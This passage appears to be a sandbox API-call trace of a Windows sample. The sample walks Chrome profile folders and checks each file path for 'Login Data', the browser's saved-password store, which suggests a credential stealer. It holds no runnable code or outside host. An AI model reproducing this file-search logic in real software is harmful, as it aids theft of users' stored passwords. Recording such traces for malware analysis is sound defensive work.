Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned 133 [0162.875] lstrlenW (lpString="LOCK") returned 4 [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925970 [0162.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK" [0162.875] VirtualQuery (in: lpAddress=0x925858, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925858 | out: hHeap=0x8e0000) returned 1 [0162.875] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOCK", lpSrch="Login Data") returned 0x0 [0162.875] VirtualQuery (in: lpAddress=0x925970, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925970 | out: hHeap=0x8e0000) returned 1 [0162.875] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x93935fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc3, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="LOG", cAlternateFileName="")) returned 1 [0162.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.875] lstrlenW (lpString="\\") returned 1 [0162.875] GetProcessHeap () returned 0x8e0000 [0162.875] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925858 [0162.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned 133 [0162.876] lstrlenW (lpString="LOG") returned 3 [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x112) returned 0x925970 [0162.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG" [0162.876] VirtualQuery (in: lpAddress=0x925858, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925858 | out: hHeap=0x8e0000) returned 1 [0162.876] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\LOG", lpSrch="Login Data") returned 0x0 [0162.876] VirtualQuery (in: lpAddress=0x925970, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925970 | out: hHeap=0x8e0000) returned 1 [0162.876] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84254520, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0162.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned 132 [0162.876] lstrlenW (lpString="\\") returned 1 [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925858 [0162.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0162.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned 133 [0162.876] lstrlenW (lpString="MANIFEST-000001") returned 15 [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x12a) returned 0x925970 [0162.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\" [0162.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" [0162.876] VirtualQuery (in: lpAddress=0x925858, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.876] GetProcessHeap () returned 0x8e0000 [0162.876] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925858 | out: hHeap=0x8e0000) returned 1 [0162.876] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0162.876] VirtualQuery (in: lpAddress=0x925970, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.876] GetProcessHeap () returned 0x8e0000 [0162.877] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925970 | out: hHeap=0x8e0000) returned 1 [0162.877] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84254520, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84254520, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84254520, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0162.877] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0162.877] VirtualQuery (in: lpAddress=0x925738, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.877] GetProcessHeap () returned 0x8e0000 [0162.877] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925738 | out: hHeap=0x8e0000) returned 1 [0162.877] VirtualQuery (in: lpAddress=0x925620, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.877] GetProcessHeap () returned 0x8e0000 [0162.877] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925620 | out: hHeap=0x8e0000) returned 1 [0162.877] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8448d2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8448d2b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkedcjkdefgpdelpbcmbmeomcjbeemfm", cAlternateFileName="PKEDCJ~1")) returned 0 [0162.878] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0162.878] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.878] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.878] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8195e7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites", cAlternateFileName="TOPSIT~1")) returned 1 [0162.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.878] lstrlenW (lpString="\\") returned 1 [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.878] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.878] lstrlenW (lpString="Top Sites") returned 9 [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925550 [0162.878] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Top Sites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" [0162.878] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.878] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites", lpSrch="Login Data") returned 0x0 [0162.878] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.878] GetProcessHeap () returned 0x8e0000 [0162.878] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.878] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d8c9a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d8c9a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81984910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites-journal", cAlternateFileName="TOPSIT~2")) returned 1 [0162.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.878] lstrlenW (lpString="\\") returned 1 [0162.878] GetProcessHeap () returned 0x8e0000 [0162.879] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.879] lstrlenW (lpString="Top Sites-journal") returned 17 [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbc) returned 0x925550 [0162.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Top Sites-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" [0162.879] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.879] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal", lpSrch="Login Data") returned 0x0 [0162.879] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.879] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c2e920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x88c2e920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x88c2e920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x0, dwReserved1=0x0, cFileName="TransportSecurity", cAlternateFileName="TRANSP~1")) returned 1 [0162.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.879] lstrlenW (lpString="\\") returned 1 [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.879] lstrlenW (lpString="TransportSecurity") returned 17 [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbc) returned 0x925550 [0162.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="TransportSecurity" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" [0162.879] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.879] GetProcessHeap () returned 0x8e0000 [0162.879] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.880] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity", lpSrch="Login Data") returned 0x0 [0162.880] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, 